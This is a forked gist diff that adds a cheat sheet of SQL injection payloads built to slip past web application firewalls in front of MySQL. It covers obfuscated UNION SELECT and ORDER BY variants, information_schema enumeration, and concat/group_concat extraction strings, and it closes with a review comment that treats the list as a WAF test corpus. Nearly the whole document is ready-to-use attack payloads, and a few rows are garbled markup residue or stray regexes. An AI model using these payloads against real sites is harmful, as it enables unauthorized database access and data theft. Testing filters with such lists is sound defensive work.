
@naurizs
Forked from zetc0de/sqli-bypass-waf.txt
Created August 12, 2021 14:11

Revisions

  1. @zetc0de zetc0de created this gist Jun 26, 2018.
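--- a/sqli-bypass-waf.txt
+++ b/sqli-bypass-waf.txt
@@ -0,0 +1,155 @@
+[~] order by [~]
+
+/**/ORDER/**/BY/**/
+/*!order*/+/*!by*/
+/*!ORDER BY*/
+/*!50000ORDER BY*/
+/*!50000ORDER*//**//*!50000BY*/
+/*!12345ORDER*/+/*!BY*/
+
+[~] UNION select [~]
+
+/*!50000%55nIoN*/ /*!50000%53eLeCt*/
+%55nion(%53elect 1,2,3)-- -
++union+distinct+select+
++union+distinctROW+select+
+/**//*!12345UNION SELECT*//**/
+/**//*!50000UNION SELECT*//**/
+/**/UNION/**//*!50000SELECT*//**/
+/*!50000UniON SeLeCt*/
+union /*!50000%53elect*/
++#uNiOn+#sEleCt
++#1q%0AuNiOn all#qa%0A#%0AsEleCt
+/*!%55NiOn*/ /*!%53eLEct*/
+/*!u%6eion*/ /*!se%6cect*/
++un/**/ion+se/**/lect
+uni%0bon+se%0blect
+%2f**%2funion%2f**%2fselect
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
+REVERSE(noinu)+REVERSE(tceles)
+/*--*/union/*--*/select/*--*/
+union (/*!/**/ SeleCT */ 1,2,3)
+/*!union*/+/*!select*/
+union+/*!select*/
+/**/union/**/select/**/
+/**/uNIon/**/sEleCt/**/
++%2F**/+Union/*!select*/
+/**//*!union*//**//*!select*//**/
+/*!uNIOn*/ /*!SelECt*/
++union+distinct+select+
++union+distinctROW+select+
+uNiOn aLl sElEcT
+UNIunionON+SELselectECT
+/**/union/*!50000select*//**/
+0%a0union%a0select%09
+%0Aunion%0Aselect%0A
+%55nion/**/%53elect
+uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
+%0A%09UNION%0CSELECT%10NULL%
+/*!union*//*--*//*!all*//*--*//*!select*/
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
+/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
++UnIoN/*&a=*/SeLeCT/*&a=*/
+union+sel%0bect
++uni*on+sel*ect+
++#1q%0Aunion all#qa%0A#%0Aselect
+union(select (1),(2),(3),(4),(5))
+UNION(SELECT(column)FROM(table))
+%23xyz%0AUnIOn%23xyz%0ASeLecT+
+%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
+union(select(1),2,3)
+union (select 1111,2222,3333)
+uNioN (/*!/**/ SeleCT */ 11)
+union (select 1111,2222,3333)
++#1q%0AuNiOn all#qa%0A#%0AsEleCt
+/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
+%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
++%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
++union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
+/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
++%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
+/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
+/union\sselect/g
+/union\s+select/i
+/*!UnIoN*/SeLeCT
++UnIoN/*&a=*/SeLeCT/*&a=*/
++uni>on+sel>ect+
++(UnIoN)+(SelECT)+
++(UnI)(oN)+(SeL)(EcT)
++’UnI”On’+'SeL”ECT’
++uni on+sel ect+
++/*!UnIoN*/+/*!SeLeCt*/+
+/*!u%6eion*/ /*!se%6cect*/
+uni%20union%20/*!select*/%20
+union%23aa%0Aselect
+/**/union/*!50000select*/
+/^.*union.*$/ /^.*select.*$/
+/*union*/union/*select*/select+
+/*uni X on*/union/*sel X ect*/
++un/**/ion+sel/**/ect+
++UnIOn%0d%0aSeleCt%0d%0a
+UNION/*&test=1*/SELECT/*&pwn=2*/
+un?<ion sel="">+un/**/ion+se/**/lect+
++UNunionION+SEselectLECT+
++uni%0bon+se%0blect+
+%252f%252a*/union%252f%252a /select%252f%252a*/
+/%2A%2A/union/%2A%2A/select/%2A%2A/
+%2f**%2funion%2f**%2fselect%2f**%2f
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
+/*!UnIoN*/SeLecT+
+
+[~] information_schema.tables [~]
+
+/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
+/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
+/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
+/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
+/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
+/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
+
+[~] concat() [~]
+
+CoNcAt()
+concat()
+CON%08CAT()
+CoNcAt()
+%0AcOnCat()
+/**//*!12345cOnCat*/
+/*!50000cOnCat*/(/*!*/)
+unhex(hex(concat(table_name)))
+unhex(hex(/*!12345concat*/(table_name)))
+unhex(hex(/*!50000concat*/(table_name)))
+
+[~] group_concat() [~]
+
+/*!group_concat*/()
+gRoUp_cOnCAt()
+group_concat(/*!*/)
+group_concat(/*!12345table_name*/)
+group_concat(/*!50000table_name*/)
+/*!group_concat*/(/*!12345table_name*/)
+/*!group_concat*/(/*!50000table_name*/)
+/*!12345group_concat*/(/*!12345table_name*/)
+/*!50000group_concat*/(/*!50000table_name*/)
+/*!GrOuP_ConCaT*/()
+/*!12345GroUP_ConCat*/()
+/*!50000gRouP_cOnCaT*/()
+/*!50000Gr%6fuP_c%6fnCAT*/()
+unhex(hex(group_concat(table_name)))
+unhex(hex(/*!group_concat*/(/*!table_name*/)))
+unhex(hex(/*!12345group_concat*/(table_name)))
+unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
+unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
+unhex(hex(/*!50000group_concat*/(table_name)))
+unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
+unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
+convert(group_concat(table_name)+using+ascii)
+convert(group_concat(/*!table_name*/)+using+ascii)
+convert(group_concat(/*!12345table_name*/)+using+ascii)
+convert(group_concat(/*!50000table_name*/)+using+ascii)
+CONVERT(group_concat(table_name)+USING+latin1)
+CONVERT(group_concat(table_name)+USING+latin2)
+CONVERT(group_concat(table_name)+USING+latin3)
+CONVERT(group_concat(table_name)+USING+latin4)
+CONVERT(group_concat(table_name)+USING+latin5)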
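Review bot: The added file has no header saying which database engine or purpose it targets, and several rows are not input strings at all: `/union\sselect/g`, `/union\s+select/i` and `/^.*union.*$/ /^.*select.*$/` read as filter regexes, and the two rows containing `<on all="" sel="">` look like markup-mangled residue rather than intended entries. The `/*!50000…*/` forms are MySQL version-conditional comments, so as a WAF regression corpus this list only says something about rules sitting in front of MySQL/MariaDB; a first line such as `# MySQL/MariaDB only - WAF rule regression inputs; the fix for the underlying flaw is parameterized queries, not more signatures` would make that explicit. Several rows are exact duplicates (for example `+union+distinct+select+` and `+UnIoN/*&a=*/SeLeCT/*&a=*/` each appear twice), so deduplicating would let a rule test count each case once. The curly quotes in `+’UnI”On’+'SeL”ECT’` are presumably an editor substitution and should be confirmed against the intended ASCII quotes.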